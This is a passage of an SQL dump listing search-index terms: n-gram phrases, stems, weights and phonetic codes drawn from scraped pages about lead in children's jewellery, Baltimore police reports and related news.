found',0,1,1.5,'B36153',1,'en'),(44640,'bpa','bpa',0,0,0.2,'B000',1,'en'),(44641,'bpa and','bpa and',0,1,1.2333,'B530',1,'en'),(44642,'bpa and lead','bpa and lead',0,1,1.4,'B5343',1,'en'),(44643,'bracelet','bracelet',0,0,0.5333,'B6243',1,'en'),(44644,'bracelet are','bracelet are',0,1,1.4,'B62436',1,'en'),(44645,'bracelet are 25','bracelet are 25',0,1,1.5,'B62436',1,'en'),(44646,'bracelets with','bracelet with',0,1,1.4667,'B624323',1,'en'),(44647,'bracelets with a','bracelet with a',0,1,1.5333,'B624323',1,'en'),(44648,'bracelets with excessive','bracelet with excessive',0,1,1.8,'B62432321',1,'en'),(44649,'bracelets-pandora','bracelets-pandora',0,0,1,'B624321536',1,'en'),(44650,'bracelets-pandora html','bracelets-pandora html',0,1,1.7333,'B624321536354',1,'en'),(44651,'bracelets-pandora html baby\'s','bracelets-pandora html baby',0,1,1.9667,'B62432153635412',1,'en'),(44652,'but with','but with',0,1,1.2667,'B300',1,'en'),(44653,'but with teething','but with teething',0,1,1.5667,'B352',1,'en'),(44654,'by abigail','by abigail',0,1,1.3333,'B240',1,'en'),(44655,'by abigail eco-friendly','by abigail eco-friendly',0,1,1.7667,'B24216534',1,'en'),(44656,'by datebaltimore','by datebaltimore',0,1,1.5333,'B314356',1,'en'),(44657,'by datebaltimore health','by datebaltimore health',0,1,1.7667,'B31435643',1,'en'),(44658,'by eileen','by eileen',0,1,1.3,'B450',1,'en'),(44659,'by eileen ambrose','by eileen ambrose',0,1,1.5667,'B45162',1,'en'),(44660,'by removing','by removing',0,1,1.3667,'B65152',1,'en'),(44661,'by removing back','by removing back',0,1,1.5333,'B6515212',1,'en'),(44662,'by the baltimore','by the baltimore',0,1,1.5333,'B314356',1,'en'),(44663,'ca','ca',0,0,0.1333,'C000',1,'en'),(44664,'ca bracelets-pandora','ca bracelets-pandora',0,1,1.6667,'C1624321536',1,'en'),(44665,'ca bracelets-pandora html','ca bracelets-pandora html',0,1,1.8333,'C1624321536354',1,'en'),(44666,'cadmium','cadmium',0,0,0.4667,'C350',1,'en'),(44667,'cadmium on','cadmium on',0,1,1.3333,'C350',1,'en'),(44668,'cadmium on this','cadmium on this',0,1,1.5,'C3532',1,'en'),(44669,'cadmium probe','cadmium probe',0,1,1.4333,'C35161',1,'en'),(44670,'cadmium probe forces','cadmium probe forces',0,1,1.6667,'C3516162',1,'en'),(44671,'can chomp','can chomp',0,1,1.3,'C5251',1,'en'),(44672,'can chomp away','can chomp away',0,1,1.4667,'C5251',1,'en'),(44673,'care in','care in',0,1,1.2333,'C650',1,'en'),(44674,'care in towson','care in towson',0,1,1.4667,'C65325',1,'en'),(44675,'chain sold','chain sold',0,1,1.3333,'C5243',1,'en'),(44676,'chain sold at','chain sold at',0,1,1.4333,'C5243',1,'en'),(44677,'charm bracelets','charm bracelets',0,1,1.5,'C65162432',1,'en'),(44678,'charm bracelets with','charm bracelets with',0,1,1.6667,'C651624323',1,'en'),(44679,'chewy','chewi',0,0,0.3333,'C000',1,'en'),(44680,'chewy ring','chewi ring',0,1,1.3333,'C652',1,'en'),(44681,'chewy ring by','chewi ring by',0,1,1.4333,'C6521',1,'en'),(44682,'children\'s','children',0,0,0.6667,'C43652',1,'en'),(44683,'children\'s bracelets','children bracelets',0,1,1.6667,'C43652162432',1,'en'),(44684,'children\'s bracelets with','children bracelets with',0,1,1.8333,'C436521624323',1,'en'),(44685,'children\'s jewelry','children jewelry',0,1,1.6,'C4365246',1,'en'),(44686,'children\'s jewelry because','children jewelry because',0,1,1.8667,'C436524612',1,'en'),(44687,'children\'s jewelry by','children jewelry by',0,1,1.7,'C43652461',1,'en'),(44688,'chomp','chomp',0,0,0.3333,'C510',1,'en'),(44689,'chomp away','chomp away',0,1,1.3333,'C510',1,'en'),(44690,'chomp away they\'re','chomp away they',0,1,1.6,'C5136',1,'en'),(44691,'cited by','cite by',0,1,1.2667,'C310',1,'en'),(44692,'cited by the','cite by the',0,1,1.4,'C313',1,'en'),(44693,'cited for','cite for',0,1,1.3,'C316',1,'en'),(44694,'cited for lead','cite for lead',0,1,1.4667,'C31643',1,'en'),(44695,'cites','cite',0,0,0.3333,'C320',1,'en'),(44696,'cites store','cite store',0,1,1.3667,'C3236',1,'en'),(44697,'cites store for','cite store for',0,1,1.5,'C323616',1,'en'),(44698,'city health','citi health',0,1,1.3667,'C343',1,'en'),(44699,'city health system','citi health system',0,1,1.6,'C343235',1,'en'),(44700,'city limit','citi limit',0,1,1.3333,'C3453',1,'en'),(44701,'city limit our','citi limit our',0,1,1.4667,'C34536',1,'en'),(44702,'co and','co and',0,1,1.2,'C530',1,'en'),(44703,'co and was','co and was',0,1,1.3333,'C532',1,'en'),(44704,'co articles','co articles',0,1,1.3667,'C63242',1,'en'),(44705,'co articles by','co articles by',0,1,1.4667,'C632421',1,'en'),(44706,'cockeysville','cockeysvil',0,0,0.8,'C140',1,'en'),(44707,'cockeysville precinct','cockeysvil precinct',0,1,1.7,'C14162523',1,'en'),(44708,'cockeysville precinct our','cockeysvil precinct our',0,1,1.8333,'C141625236',1,'en'),(44709,'cohn','cohn',0,0,0.2667,'C500',1,'en'),(44710,'cohn the','cohn the',0,1,1.2667,'C530',1,'en'),(44711,'cohn the baltimore','cohn the baltimore',0,1,1.6,'C5314356',1,'en'),(44712,'college no.49','colleg no.49',0,1,1.4333,'C425',1,'en'),(44713,'college no.49 and','colleg no.49 and',0,1,1.5667,'C4253',1,'en'),(44714,'colored bangle','color bangle',0,1,1.4667,'C4631524',1,'en'),(44715,'colored bangle bracelet','color bangle bracelet',0,1,1.7667,'C463152416243',1,'en'),(44716,'coming from','come from',0,1,1.3667,'C52165',1,'en'),(44717,'coming from oct','come from oct',0,1,1.5,'C5216523',1,'en'),(44718,'commission','commiss',0,0,0.6667,'C525',1,'en'),(44719,'commission says','commiss says',0,1,1.5,'C5252',1,'en'),(44720,'commission says the','commiss says the',0,1,1.6333,'C52523',1,'en'),(44721,'commission to','commiss to',0,1,1.4333,'C5253',1,'en'),(44722,'commission to the','commiss to the',0,1,1.5667,'C5253',1,'en'),(44723,'company even','compani even',0,1,1.4,'C51515',1,'en'),(44724,'company even has','compani even has',0,1,1.5333,'C515152',1,'en'),(44725,'compiled','compil',0,0,0.5333,'C5143',1,'en'),(44726,'compiled from','compil from',0,1,1.4333,'C5143165',1,'en'),(44727,'compiled from police','compil from police',0,1,1.6667,'C5143165142',1,'en'),(44728,'comprised','compris',0,0,0.6,'C51623',1,'en'),(44729,'comprised of','compris of',0,1,1.4,'C516231',1,'en'),(44730,'comprised of the','compris of the',0,1,1.5333,'C5162313',1,'en'),(44731,'consumer product','consum product',0,1,1.5333,'C525616323',1,'en'),(44732,'consumer product safety','consum product safety',0,1,1.7667,'C525616323213',1,'en'),(44733,'current red','current red',0,1,1.3667,'C65363',1,'en'),(44734,'current red nosed','current red nosed',0,1,1.5667,'C65363523',1,'en'),(44735,'datebaltimore','datebaltimor',0,0,0.8667,'D14356',1,'en'),(44736,'datebaltimore health','datebaltimor health',0,1,1.6667,'D1435643',1,'en'),(44737,'datebaltimore health split','datebaltimor health split',0,1,1.8667,'D14356432143',1,'en'),(44738,'department','depart',0,0,0.6667,'D16353',1,'en'),(44739,'department which','depart which',0,1,1.5333,'D163532',1,'en'),(44740,'department which alerted','depart which alerted',0,1,1.8,'D163532463',1,'en'),(44741,'derived','deriv',0,0,0.4667,'D613',1,'en'),(44742,'derived linda','deriv linda',0,1,1.4333,'D613453',1,'en'),(44743,'derived linda thema','deriv linda thema',0,1,1.6333,'D6134535',1,'en'),(44744,'descriptions','descript',0,0,0.8,'D261352',1,'en'),(44745,'descriptions only','descript only',0,1,1.5667,'D26135254',1,'en'),(44746,'descriptions only when','descript only when',0,1,1.7333,'D261352545',1,'en'),(44747,'dojo','dojo',0,0,0.2667,'D200',1,'en'),(44748,'dojo public','dojo public',0,1,1.3667,'D2142',1,'en'),(44749,'dojo public college','dojo public college',0,1,1.6333,'D214242',1,'en'),(44750,'dollar type','dollar type',0,1,1.3667,'D4631',1,'en'),(44751,'dollar type supplies','dollar type supplies',0,1,1.6667,'D46312142',1,'en'),(44752,'don\'t forget','don forget',0,1,1.4,'D531623',1,'en'),(44753,'don\'t forget national','don forget national',0,1,1.7,'D5316235354',1,'en'),(44754,'door arizona','door arizona',0,1,1.4,'D625',1,'en'),(44755,'door arizona manda','door arizona manda',0,1,1.6,'D6253',1,'en'),(44756,'e lee','e lee',0,1,1.1667,'E400',1,'en'),(44757,'e lee their','e lee their',0,1,1.3667,'E436',1,'en'),(44758,'eco-friendly','eco-friendli',0,0,0.8,'E216534',1,'en'),(44759,'eco-friendly may','eco-friendli may',0,1,1.5333,'E2165345',1,'en'),(44760,'eco-friendly may 28','eco-friendli may 28',0,1,1.6333,'E2165345',1,'en'),(44761,'edmondson','edmondson',0,0,0.6,'E35325',1,'en'),(44762,'edmondson ave','edmondson ave',0,1,1.4333,'E353251',1,'en'),(44763,'edmondson ave both','edmondson ave both',0,1,1.6,'E3532513',1,'en'),(44764,'eileen','eileen',0,0,0.4,'E450',1,'en'),(44765,'eileen ambrose','eileen ambrose',0,1,1.4667,'E45162',1,'en'),(44766,'eileen ambrose together','eileen ambrose together',0,1,1.7667,'E451623236',1,'en'),(44767,'enough information','enough information',0,1,1.6,'E52516535',1,'en'),(44768,'enough information to','enough information to',0,1,1.7,'E525165353',1,'en'),(44769,'entry by','entri by',0,1,1.2667,'E5361',1,'en'),(44770,'entry by removing','entri by removing',0,1,1.5667,'E536165152',1,'en'),(44771,'even has','even has',0,1,1.2667,'E152',1,'en'),(44772,'even has a','even has a',0,1,1.3333,'E152',1,'en'),(44773,'excessive','excess',0,0,0.6,'E210',1,'en'),(44774,'excessive levels','excess levels',0,1,1.5333,'E214142',1,'en'),(44775,'excessive levels of','excess levels of',0,1,1.6333,'E2141421',1,'en'),(44776,'fact it','fact it',0,1,1.2333,'F230',1,'en'),(44777,'fact it is','fact it is',0,1,1.3333,'F232',1,'en'),(44778,'fallstaff','fallstaff',0,0,0.6,'F4231',1,'en'),(44779,'fallstaff she','fallstaff she',0,1,1.4333,'F42312',1,'en'),(44780,'fallstaff she arrived','fallstaff she arrived',0,1,1.7,'F42312613',1,'en'),(44781,'fan','fan',0,0,0.2,'F500',1,'en'),(44782,'fan they\'re','fan they',0,1,1.3667,'F536',1,'en'),(44783,'fan they\'re with','fan they with',0,1,1.5333,'F5363',1,'en'),(44784,'fda','fda',0,0,0.2,'F300',1,'en'),(44785,'fda approved','fda approved',0,1,1.4,'F31613',1,'en'),(44786,'fda approved bpa','fda approved bpa',0,1,1.5333,'F316131',1,'en'),(44787,'federal regulators','feder regulators',0,1,1.6,'F364624362',1,'en'),(44788,'federal regulators are','feder regulators are',0,1,1.7333,'F3646243626',1,'en'),(44789,'findings','find',0,0,0.5333,'F5352',1,'en'),(44790,'findings cadmium','find cadmium',0,1,1.5333,'F535235',1,'en'),(44791,'findings cadmium probe','find cadmium probe',0,1,1.7333,'F535235161',1,'en'),(44792,'floor bedroom','floor bedroom',0,1,1.4333,'F461365',1,'en'),(44793,'floor bedroom november.22.gate','floor bedroom november.22.gate',0,1,2,'F461365151623',1,'en'),(44794,'following tori','follow tori',0,1,1.4667,'F45236',1,'en'),(44795,'following tori spelling\'s','follow tori spelling',0,1,1.8333,'F4523621452',1,'en'),(44796,'follows','follow',0,0,0.4667,'F420',1,'en'),(44797,'follows is','follow is',0,1,1.3333,'F420',1,'en'),(44798,'follows is compiled','follow is compiled',0,1,1.6333,'F425143',1,'en'),(44799,'for grabs','for grabs',0,1,1.3,'F62612',1,'en'),(44800,'for grabs and','for grabs and',0,1,1.4333,'F6261253',1,'en'),(44801,'for lead','for lead',0,1,1.2667,'F643',1,'en'),(44802,'for lead infractions','for lead infractions',0,1,1.6667,'F6435162352',1,'en'),(44803,'for selling','for selling',0,1,1.3667,'F62452',1,'en'),(44804,'for selling children\'s','for selling children',0,1,1.7333,'F6245243652',1,'en'),(44805,'for selling lead','for selling lead',0,1,1.5333,'F6245243',1,'en'),(44806,'forces http','forc http',0,1,1.3667,'F6231',1,'en'),(44807,'forces http www','forc http www',0,1,1.5,'F6231',1,'en'),(44808,'forget national','forget national',0,1,1.5,'F6235354',1,'en'),(44809,'forget national 22','forget national 22',0,1,1.6,'F6235354',1,'en'),(44810,'found to have','found to have',0,1,1.4333,'F531',1,'en'),(44811,'free material','free material',0,1,1.4333,'F65364',1,'en'),(44812,'free material as','free material as',0,1,1.5333,'F653642',1,'en'),(44813,'from bedroom','from bedroom',0,1,1.4,'F651365',1,'en'),(44814,'from bedroom ladder','from bedroom ladder',0,1,1.6333,'F651365436',1,'en'),(44815,'from kids','from kids',0,1,1.3,'F65232',1,'en'),(44816,'from kids and','from kids and',0,1,1.4333,'F6523253',1,'en'),(44817,'from neighbor','from neighbor',0,1,1.4333,'F65216',1,'en'),(44818,'from neighbor then','from neighbor then',0,1,1.6,'F6521635',1,'en'),(44819,'from oct','from oct',0,1,1.2667,'F6523',1,'en'),(44820,'from oct 11','from oct 11',0,1,1.3667,'F6523',1,'en'),(44821,'from police','from police',0,1,1.3667,'F65142',1,'en'),(44822,'from police reports','from police reports',0,1,1.6333,'F6514261632',1,'en'),(44823,'from safe','from safe',0,1,1.3,'F6521',1,'en'),(44824,'from safe at','from safe at',0,1,1.4,'F65213',1,'en'),(44825,'from the cockeysville','from the cockeysville',0,1,1.7,'F653214',1,'en'),(44826,'from the same','from the same',0,1,1.4333,'F65325',1,'en'),(44827,'generators','gener',0,0,0.6667,'G56362',1,'en'),(44828,'generators derived','gener derived',0,1,1.6,'G563623613',1,'en'),(44829,'generators derived linda','gener derived linda',0,1,1.8,'G563623613453',1,'en'),(44830,'get into','get into',0,1,1.2667,'G353',1,'en'),(44831,'get into second','get into second',0,1,1.5,'G353253',1,'en'),(44832,'gilchrist','gilchrist',0,0,0.6,'G42623',1,'en'),(44833,'gilchrist surgery','gilchrist surgery',0,1,1.5667,'G426232626',1,'en'),(44834,'gilchrist surgery care','gilchrist surgery care',0,1,1.7333,'G42623262626',1,'en'),(44835,'grabs','grab',0,0,0.3333,'G612',1,'en'),(44836,'grabs and','grab and',0,1,1.3,'G61253',1,'en'),(44837,'grabs and gums','grab and gums',0,1,1.4667,'G61253252',1,'en'),(44838,'greenback','greenback',0,0,0.6,'G6512',1,'en'),(44839,'greenback party','greenback party',0,1,1.5,'G6512163',1,'en'),(44840,'greenback party at','greenback party at',0,1,1.6,'G6512163',1,'en'),(44841,'gums','gum',0,0,0.2667,'G520',1,'en'),(44842,'gums when','gum when',0,1,1.3,'G525',1,'en'),(44843,'gums when you','gum when you',0,1,1.4333,'G525',1,'en'),(44844,'has a high','ha a high',0,1,1.3333,'H200',1,'en'),(44845,'has been cited','ha been cited',0,1,1.4667,'H21523',1,'en'),(44846,'have a baby','have a baby',0,1,1.3667,'H100',1,'en'),(44847,'have lead','have lead',0,1,1.3,'H143',1,'en'),(44848,'have lead levels','have lead levels',0,1,1.5333,'H1434142',1,'en'),(44849,'health','health',0,0,0.4,'H430',1,'en'),(44850,'health department','health department',0,1,1.5667,'H4316353',1,'en'),(44851,'health department which','health department which',0,1,1.7667,'H43163532',1,'en'),(44852,'health split','health split',0,1,1.4,'H432143',1,'en'),(44853,'health split cites','health split cites',0,1,1.6,'H432143232',1,'en'),(44854,'health system','health system',0,1,1.4333,'H43235',1,'en'),(44855,'health system for','health system for',0,1,1.5667,'H4323516',1,'en'),(44856,'heights','height',0,0,0.4667,'H232',1,'en'),(44857,'heights ave','height ave',0,1,1.3667,'H2321',1,'en'),(44858,'heights ave has','height ave has',0,1,1.5,'H23212',1,'en'),(44859,'heights avenue','height avenue',0,1,1.4667,'H23215',1,'en'),(44860,'heights avenue has','height avenue has',0,1,1.6,'H232152',1,'en'),(44861,'held the belle','held the belle',0,1,1.4667,'H4314',1,'en'),(44862,'her aunt','her aunt',0,1,1.2667,'H653',1,'en'),(44863,'her aunt augusta','her aunt augusta',0,1,1.5333,'H65323',1,'en'),(44864,'high amount','high amount',0,1,1.3667,'H253',1,'en'),(44865,'high amount toxic','high amount toxic',0,1,1.5667,'H2532',1,'en'),(44866,'high profile','high profile',0,1,1.4,'H21614',1,'en'),(44867,'high profile following','high profile following',0,1,1.7333,'H216141452',1,'en'),(44868,'homemaker','homemak',0,0,0.6,'H526',1,'en'),(44869,'homemaker who','homemak who',0,1,1.4333,'H526',1,'en'),(44870,'homemaker who literally','homemak who literally',0,1,1.7667,'H5264364',1,'en'),(44871,'html baby\'s','html baby',0,1,1.3667,'H35412',1,'en'),(44872,'html baby\'s jewelry','html baby jewelry',0,1,1.6333,'H3541246',1,'en'),(44873,'http www milagrofilms','http www milagrofilms',0,1,1.7,'H3154261452',1,'en'),(44874,'immediately','immedi',0,0,0.7333,'I534',1,'en'),(44875,'immediately be','immedi be',0,1,1.4667,'I5341',1,'en'),(44876,'immediately be taken','immedi be taken',0,1,1.6667,'I5341325',1,'en'),(44877,'in baltimore','in baltimore',0,1,1.4,'I514356',1,'en'),(44878,'in baltimore she','in baltimore she',0,1,1.5333,'I5143562',1,'en'),(44879,'in fact it','in fact it',0,1,1.3333,'I5123',1,'en'),(44880,'in fallstaff','in fallstaff',0,1,1.4,'I514231',1,'en'),(44881,'in fallstaff she','in fallstaff she',0,1,1.5333,'I5142312',1,'en'),(44882,'in line','in line',0,1,1.2333,'I545',1,'en'),(44883,'in line with','in line with',0,1,1.4,'I5453',1,'en'),(44884,'in many years','in many years',0,1,1.4333,'I562',1,'en'),(44885,'in owings','in owings',0,1,1.3,'I520',1,'en'),(44886,'in owings generators','in owings generators',0,1,1.6667,'I5256362',1,'en'),(44887,'in the various','in the various',0,1,1.4667,'I53162',1,'en'),(44888,'in towson','in towson',0,1,1.3,'I5325',1,'en'),(44889,'in towson she','in towson she',0,1,1.4333,'I53252',1,'en'),(44890,'in your arms','in your arms',0,1,1.4,'I5652',1,'en'),(44891,'include descriptions','includ descriptions',0,1,1.6667,'I5243261352',1,'en'),(44892,'include descriptions only','includ descriptions only',0,1,1.8333,'I524326135254',1,'en'),(44893,'individuality','individu',0,0,0.8667,'I531343',1,'en'),(44894,'individuality possible','individu possible',0,1,1.7333,'I5313431214',1,'en'),(44895,'individuality possible april.18.cash','individu possible april.18.cash',0,1,2,'I53134312141642',1,'en'),(44896,'individuality possible november.21.jewelry','individu possible november.21.jewelry',0,1,2,'I531343121451516246',1,'en'),(44897,'information to','inform to',0,1,1.4667,'I5165353',1,'en'),(44898,'information to make','inform to make',0,1,1.6333,'I516535352',1,'en'),(44899,'infractions','infract',0,0,0.7333,'I5162352',1,'en'),(44900,'infractions in','infract in',0,1,1.4667,'I51623525',1,'en'),(44901,'infractions in line','infract in line',0,1,1.6333,'I5162352545',1,'en'),(44902,'inhibit','inhibit',0,0,0.4667,'I513',1,'en'),(44903,'inhibit coming','inhibit coming',0,1,1.4667,'I513252',1,'en'),(44904,'inhibit coming from','inhibit coming from',0,1,1.6333,'I513252165',1,'en'),(44905,'inn','inn',0,0,0.2,'I500',1,'en'),(44906,'inn entry','inn entry',0,1,1.3,'I536',1,'en'),(44907,'inn entry by','inn entry by',0,1,1.4,'I5361',1,'en'),(44908,'insurance','insur',0,0,0.6,'I52652',1,'en'),(44909,'insurance professional','insur professional',0,1,1.7333,'I52652161254',1,'en'),(44910,'insurance professional her','insur professional her',0,1,1.8667,'I526521612546',1,'en'),(44911,'into second','into second',0,1,1.3667,'I53253',1,'en'),(44912,'into second floor','into second floor',0,1,1.5667,'I53253146',1,'en'),(44913,'is compiled','is compiled',0,1,1.3667,'I25143',1,'en'),(44914,'is compiled from','is compiled from',0,1,1.5333,'I25143165',1,'en'),(44915,'is comprised','is comprised',0,1,1.4,'I251623',1,'en'),(44916,'is comprised of','is comprised of',0,1,1.5,'I2516231',1,'en'),(44917,'is enough','is enough',0,1,1.3,'I252',1,'en'),(44918,'is enough information','is enough information',0,1,1.7,'I252516535',1,'en'),(44919,'is the city','is the city',0,1,1.3667,'I2323',1,'en'),(44920,'is the third','is the third',0,1,1.4,'I2363',1,'en'),(44921,'is to include','is to include',0,1,1.4333,'I235243',1,'en'),(44922,'isle','isl',0,0,0.2667,'I240',1,'en'),(44923,'isle taxicab','isl taxicab',0,1,1.4,'I24321',1,'en'),(44924,'isle taxicab co','isl taxicab co',0,1,1.5,'I243212',1,'en'),(44925,'it\'s milagrofilms','it milagrofilms',0,1,1.5667,'I3254261452',1,'en'),(44926,'it\'s milagrofilms charm','it milagrofilms charm',0,1,1.7667,'I325426145265',1,'en'),(44927,'items should','item should',0,1,1.4,'I35243',1,'en'),(44928,'items should immediately','item should immediately',0,1,1.8,'I35243534',1,'en'),(44929,'jewellery stolen','jewelleri stolen',0,1,1.5333,'J462345',1,'en'),(44930,'jewellery stolen the','jewelleri stolen the',0,1,1.6667,'J4623453',1,'en'),(44931,'jewelry articles','jewelri articles',0,1,1.5333,'J463242',1,'en'),(44932,'jewelry articles about','jewelri articles about',0,1,1.7333,'J46324213',1,'en'),(44933,'jewelry because','jewelri because',0,1,1.5,'J4612',1,'en'),(44934,'jewelry because of','jewelri because of',0,1,1.6,'J46121',1,'en'),(44935,'jewelry by','jewelri by',0,1,1.3333,'J461',1,'en'),(44936,'jewelry by eileen','jewelri by eileen',0,1,1.5667,'J46145',1,'en'),(44937,'jewelry is','jewelri is',0,1,1.3333,'J462',1,'en'),(44938,'jewelry is comprised','jewelri is comprised',0,1,1.6667,'J46251623',1,'en'),(44939,'jewelry pretty','jewelri pretty',0,1,1.4667,'J46163',1,'en'),(44940,'jewelry pretty chewy','jewelri pretty chewy',0,1,1.6667,'J461632',1,'en'),(44941,'jewelry recall','jewelri recall',0,1,1.4667,'J4624',1,'en'),(44942,'jewelry recall march','jewelri recall march',0,1,1.6667,'J4624562',1,'en'),(44943,'jewelry\'s','jewelri',0,0,0.6,'J462',1,'en'),(44944,'jewelry\'s up','jewelri up',0,1,1.4,'J4621',1,'en'),(44945,'jewelry\'s up for','jewelri up for',0,1,1.5333,'J46216',1,'en'),(44946,'jh','jh',0,0,0.1333,'J000',1,'en'),(44947,'jh greenback','jh greenback',0,1,1.4,'J6512',1,'en'),(44948,'jh greenback party','jh greenback party',0,1,1.6,'J6512163',1,'en'),(44949,'kicked','kick',0,0,0.4,'K300',2,'en'),(44950,'kicked in','kick in',0,1,1.3,'K350',2,'en'),(44951,'kids and','kid and',0,1,1.2667,'K3253',1,'en'),(44952,'kids and thrown','kid and thrown',0,1,1.5,'K325365',1,'en'),(44953,'ladder','ladder',0,0,0.4,'L360',1,'en'),(44954,'ladder stolen','ladder stolen',0,1,1.4333,'L362345',1,'en'),(44955,'ladder stolen from','ladder stolen from',0,1,1.6,'L362345165',1,'en'),(44956,'lane','lane',0,0,0.2667,'L500',1,'en'),(44957,'lane 13700','lane 13700',0,1,1.3333,'L500',1,'en'),(44958,'lane 13700 inhibit','lane 13700 inhibit',0,1,1.6,'L513',1,'en'),(44959,'launched company','launch company',0,1,1.5333,'L5232515',1,'en'),(44960,'launched company even','launch company even',0,1,1.7,'L523251515',1,'en'),(44961,'lead free','lead free',0,1,1.3,'L316',1,'en'),(44962,'lead free material','lead free material',0,1,1.6,'L3165364',1,'en'),(44963,'lead infractions','lead infractions',0,1,1.5333,'L35162352',1,'en'),(44964,'lead infractions in','lead infractions in',0,1,1.6333,'L351623525',1,'en'),(44965,'lead levels','lead levels',0,1,1.3667,'L34142',1,'en'),(44966,'lead levels in','lead levels in',0,1,1.4667,'L341425',1,'en'),(44967,'lead levels much','lead levels much',0,1,1.5333,'L3414252',1,'en'),(44968,'lead tainted','lead tainted',0,1,1.4,'L353',1,'en'),(44969,'lead tainted children\'s','lead tainted children',0,1,1.7667,'L353243652',1,'en'),(44970,'lead the','lead the',0,1,1.2667,'L300',1,'en'),(44971,'lead the agency','lead the agency',0,1,1.5,'L3252',1,'en'),(44972,'leaf','leaf',0,0,0.2667,'L100',1,'en'),(44973,'leaf anklet','leaf anklet',0,1,1.3667,'L15243',1,'en'),(44974,'leaf anklet stringed','leaf anklet stringed',0,1,1.6667,'L15243236523',1,'en'),(44975,'lee','lee',0,0,0.2,'L000',1,'en'),(44976,'lee their','lee their',0,1,1.3,'L360',1,'en'),(44977,'lee their dojo','lee their dojo',0,1,1.4667,'L3632',1,'en'),(44978,'levels','level',0,0,0.4,'L142',3,'en'),(44979,'levels in','level in',0,1,1.3,'L1425',1,'en'),(44980,'levels in the','level in the',0,1,1.4333,'L14253',1,'en'),(44981,'levels much','level much',0,1,1.3667,'L14252',1,'en'),(44982,'levels much more','level much more',0,1,1.5333,'L1425256',1,'en'),(44983,'levels of','level of',0,1,1.3,'L1421',1,'en'),(44984,'levels of lead','level of lead',0,1,1.4667,'L142143',1,'en'),(44985,'liberty','liberti',0,0,0.4667,'L163',1,'en'),(44986,'liberty heights','liberti heights',0,1,1.5,'L163232',1,'en'),(44987,'liberty heights ave','liberti heights ave',0,1,1.6333,'L1632321',1,'en'),(44988,'liberty heights avenue','liberti heights avenue',0,1,1.7333,'L16323215',1,'en'),(44989,'limit','limit',0,0,0.3333,'L530',1,'en'),(44990,'limit our','limit our',0,1,1.3,'L536',1,'en'),(44991,'limit our policy','limit our policy',0,1,1.5333,'L536142',1,'en'),(44992,'linda thema','linda thema',0,1,1.3667,'L535',1,'en'),(44993,'linda thema reubens','linda thema reubens',0,1,1.6333,'L5356152',1,'en'),(44994,'line with','line with',0,1,1.3,'L530',1,'en'),(44995,'line with the','line with the',0,1,1.4333,'L530',1,'en'),(44996,'literally','liter',0,0,0.6,'L364',1,'en'),(44997,'literally piano','liter piano',0,1,1.5,'L36415',1,'en'),(44998,'literally piano mentioned','liter piano mentioned',0,1,1.8333,'L36415353',1,'en'),(44999,'little of ben','littl of ben',0,1,1.4333,'L3415',1,'en'),(45000,'little sunshine','littl sunshine',0,1,1.5,'L342525',1,'en'),(45001,'little sunshine trading','littl sunshine trading',0,1,1.7667,'L34252536352',1,'en'),(45002,'lived in','live in',0,1,1.2667,'L135',1,'en'),(45003,'lived in owings','live in owings',0,1,1.5,'L1352',1,'en'),(45004,'make individuality','make individuality',0,1,1.6,'M2531343',1,'en'),(45005,'make individuality possible','make individuality possible',0,1,1.9,'M25313431214',1,'en'),(45006,'manda','manda',0,0,0.3333,'M300',1,'en'),(45007,'manda mill','manda mill',0,1,1.3333,'M354',1,'en'),(45008,'manda mill lane','manda mill lane',0,1,1.5,'M3545',1,'en'),(45009,'manufactured from','manufactur from',0,1,1.5667,'M12363165',1,'en'),(45010,'manufactured from the','manufactur from the',0,1,1.7,'M123631653',1,'en'),(45011,'many years','mani years',0,1,1.3333,'M620',1,'en'),(45012,'many years that','mani years that',0,1,1.5,'M623',1,'en'),(45013,'march','march',0,0,0.3333,'M620',2,'en'),(45014,'march 12','march 12',0,1,1.2667,'M620',1,'en'),(45015,'march 12 2010','march 12 2010',0,1,1.4333,'M620',1,'en'),(45016,'masteral','master',0,0,0.5333,'M2364',1,'en'),(45017,'masteral as','master as',0,1,1.3667,'M23642',1,'en'),(45018,'masteral as follows','master as follows',0,1,1.6333,'M23642142',1,'en'),(45019,'material as','materi as',0,1,1.3667,'M3642',1,'en'),(45020,'material as most','materi as most',0,1,1.5333,'M3642523',1,'en'),(45021,'may 28','mai 28',0,1,1.2,'M000',1,'en'),(45022,'may 28 2013','mai 28 2013',0,1,1.3667,'M000',1,'en'),(45023,'mentioned','mention',0,0,0.6,'M353',1,'en'),(45024,'mentioned in','mention in',0,1,1.4,'M3535',1,'en'),(45025,'mentioned in fallstaff','mention in fallstaff',0,1,1.7333,'M353514231',1,'en'),(45026,'meredith','meredith',0,0,0.5333,'M630',1,'en'),(45027,'meredith cohn','meredith cohn',0,1,1.4333,'M6325',1,'en'),(45028,'meredith cohn the','meredith cohn the',0,1,1.5667,'M63253',1,'en'),(45029,'metal','metal',0,0,0.3333,'M340',1,'en'),(45030,'metal cadmium','metal cadmium',0,1,1.4333,'M34235',1,'en'),(45031,'metal cadmium on','metal cadmium on',0,1,1.5333,'M34235',1,'en'),(45032,'milagrofilms ca','milagrofilm ca',0,1,1.5,'M4261452',1,'en'),(45033,'milagrofilms ca bracelets-pandora','milagrofilm ca bracelets-pandora',0,1,2,'M42614521624321536',1,'en'),(45034,'milagrofilms charm','milagrofilm charm',0,1,1.6,'M426145265',1,'en'),(45035,'milagrofilms charm bracelets','milagrofilm charm bracelets',0,1,1.9333,'M426145265162432',1,'en'),(45036,'mill','mill',0,0,0.2667,'M400',2,'en'),(45037,'mill lane','mill lane',0,1,1.3,'M450',1,'en'),(45038,'mill lane 13700','mill lane 13700',0,1,1.5,'M450',1,'en'),(45039,'million in','million in',0,1,1.3333,'M450',2,'en'),(45040,'million in fact','million in fact',0,1,1.5,'M45123',1,'en'),(45041,'modern findings','modern findings',0,1,1.5,'M36515352',1,'en'),(45042,'modern findings cadmium','modern findings cadmium',0,1,1.7667,'M3651535235',1,'en'),(45043,'mom','mom',0,0,0.2,'M000',1,'en'),(45044,'mom jewelry\'s','mom jewelry',0,1,1.4333,'M2462',1,'en'),(45045,'mom jewelry\'s up','mom jewelry up',0,1,1.5333,'M24621',1,'en'),(45046,'mom launched','mom launched',0,1,1.4,'M4523',1,'en'),(45047,'mom launched company','mom launched company',0,1,1.6667,'M45232515',1,'en'),(45048,'more 600','more 600',0,1,1.2667,'M600',1,'en'),(45049,'more 600 parts','more 600 parts',0,1,1.4667,'M61632',1,'en'),(45050,'more children\'s','more children',0,1,1.5,'M6243652',1,'en'),(45051,'more children\'s jewelry','more children 